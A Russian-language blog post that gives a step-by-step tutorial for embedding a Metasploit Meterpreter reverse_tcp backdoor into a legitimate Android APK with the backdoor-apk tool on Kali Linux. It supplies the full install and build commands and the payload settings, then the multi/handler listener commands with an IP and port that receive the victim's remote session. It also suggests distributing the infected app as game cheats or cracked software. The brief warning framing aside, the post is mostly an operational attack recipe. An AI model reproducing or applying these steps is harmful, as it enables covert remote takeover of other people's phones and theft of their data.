Найти в Дзене
Планета Шелезяка

Плохая игрушка. Как любой школьник может вшить троян в приложение для смартфона

Самый простой способ слияния apk и вируса удаленного доступа

Всем привет

Уверен на вашем смартфоне установлен не один десяток различных приложений. Это и мессенджеры, и приложения для работы с документами, игры и т.д. Если вы скачиваете всё это исключительно в Play Market, значит риск натолкнуться на вредоносное ПО - минимальный, хотя и не нулевой (да, даже там можно встретить приложения с троянами).

Однако есть и те, кто скачивает программы из сторонних источников. В этом случае шанс начнутся на вредонос резко возрастает, ведь вшить самую обычную полезную нагрузку в apk не так сложно, и с этим может справиться любой школьник.

Сейчас я продемонстрирую один из самых простых способов заражения apk файла

Работать мы будем в Kali Linux. Если вы впервые слышите о данной ОС, то можете прочитать эту статью. Также в интернете полной гайдов, как установить данную систему на виртуальную машину.

Запускаем Kali, открываем терминал и для начала поищем обновления

sudo apt update
sudo apt upgrade

После этого установим необходимые компоненты:

sudo apt install smali
sudo apt install apktool
sudo apt-get install lib32stdc++6 lib32z1

Теперь клонируем сам репозиторий с программой с github:

git clone https://github.com/dana-at-cp/backdoor-apk.git
-2

Переходим в нужную директорию:

cd backdoor-apk
cd backdoor-apk (да, два раза)

Естественно нам понадобится сам apk, который мы будем заражать. Найти его можно, например, на pdalife. Скачиваем apk и кидаем его в эту же директорию (там где находится файл backdoor-apk.sh)

Запускаем программу

./backdoor-apk.sh оригинальный.apk
Например, ./backdoor-apk.sh Drive.apk

Осталось настроить параметры полезной нагрузки.

-3
  1. Сначала указываем тип, я выбрал meterpreter/reverse_tcp
  2. Затем Ваш IP (можно узнать прописав команду ifconfig)
  3. Далее порт, через который будет идти соединение (не забудьте потом его открыть)
  4. И в конце вид слияния полезной нагрузки и оригинального apk. Я выбрал 2 вариант.

После этого запустится процесс сборки. Пример успешной сборки

-4

Далее можно закинуть данный apk под видом читов, взломанной версии игры или программы и всё. Однако показывать, как это делается, я уже не буду, чтобы не выходить за определенные рамки.

Чтобы подключиться к жертве, открываем Metasploit (командой msfconsole) и прописываем:

use multi/handler
set payload android/meterpreter/reverse_tcp (или другой тип нагрузки, который вы выбрали в начале)
set lhost ваш_IP
В моем случае:
set lhost 192.168.200.132
set lport 4444
exploit

После того, как жертва запустит apk, у вас появится сессия meterpreter.

Еще больше статей, посвященных информационной безопасности, вы можете найти в Telegram канале.